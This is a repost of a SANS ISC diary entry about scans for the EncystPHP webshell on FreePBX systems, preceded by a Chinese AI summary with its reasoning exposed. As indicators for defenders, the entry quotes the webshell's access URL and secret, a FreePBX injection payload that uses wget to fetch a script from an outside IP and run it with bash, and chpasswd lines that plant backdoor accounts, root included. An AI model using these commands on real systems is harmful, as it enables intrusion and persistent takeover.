好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读这篇文章,理解其主要内容。 文章主要讲的是网络攻击者利用一种名为EncystPHP的Webshell来攻击FreePBX系统。攻击者通过特定的请求参数md5来访问这个Webshell,参数值是固定的字符串,而不是真正的MD5哈希。这可能意味着攻击者只是复制粘贴了代码,没有做太多改动。 文章还提到攻击者的IP地址位于荷兰,并且这个IP同时在探测FreePBX的漏洞。攻击者不仅植入了Webshell,还添加了多个后门账户,这些账户的密码都是相同的加密字符串。这对于使用FreePBX的用户来说是一个潜在的安全威胁。 接下来,我需要将这些信息浓缩到100字以内。重点包括:EncystPHP Webshell、攻击FreePBX系统、利用md5参数、固定字符串、后门账户、来自荷兰的IP地址等。 然后,我要组织语言,确保句子简洁明了。例如,“网络攻击者利用EncystPHP Webshell针对FreePBX系统发起攻击。”这样开头既点明了主题,又涵盖了关键点。 最后,检查字数是否在限制内,并确保所有重要信息都被涵盖。这样用户就能快速了解文章的核心内容了。 </think> 网络攻击者利用EncystPHP Webshell针对FreePBX系统发起攻击,通过特定参数访问后门,并添加多个固定密码的后门账户,相关扫描活动来自荷兰IP地址。 2026-4-13 13:2:50 Author: isc.sans.edu(查看原文) 阅读量:9 收藏
Last week, I wrote about attackers scanning for various webshells, hoping to find some that do not require authentication or others that use well-known credentials. But some attackers are paying attention and are deploying webshells with more difficult-to-guess credentials. Today, I noticed some scans for what appears to be the "EncystPHP" web shell. Fortinet wrote about this webshell back in January. It appears to be a favorite among attackers compromising vulnerable FreePBX systems.
The requests I observed look like:
GET /admin/modules/phones/ajax.php?md5=cf710203400b8c466e6dfcafcf36a411
Host: [victim ip address]:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
This URL matches what Fortinet reported back in January.
The parameter name "md5" is a bit misleading. The webshell will just compare the string. The parameter is not necessarily the MD5 hash of a specific "password"; any string will work as long as it matches the hard-coded string in the webshell. The string above has the correct length for an MD5 hash, but I wasn't able to find it in common MD5 hash databases. It is very possible that only a few different values are used across different attack campaigns. Many attackers may just "copy/paste" the code, including this access secret.
Currently, these probes originate from 160.119.76.250, an IP address located in the Netherlands. The IP address hosts an unconfigured web server.
The same IP address is also probing for various FreePBX vulnerabilities, for example:
/restapps/applications.php?linestate=$$LINESTATE$$&user=100
Context: ext-localAction: Originate
Channel: Local/DONTCALL@macro-dial
Application: system
data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/k
This request also matches the scans reported by Fortinet, and it returns the EncystPHP webshell. This version is also adding the following backdoor accounts:
echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'hima:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'asterisk:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'sugarmaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'spamfilter:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'asteriskuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'supports:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'supermaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'juba:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
If you are using FreePBX, you may want to check for these accounts just to make sure.
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
如有侵权请联系:admin#unsafe.sh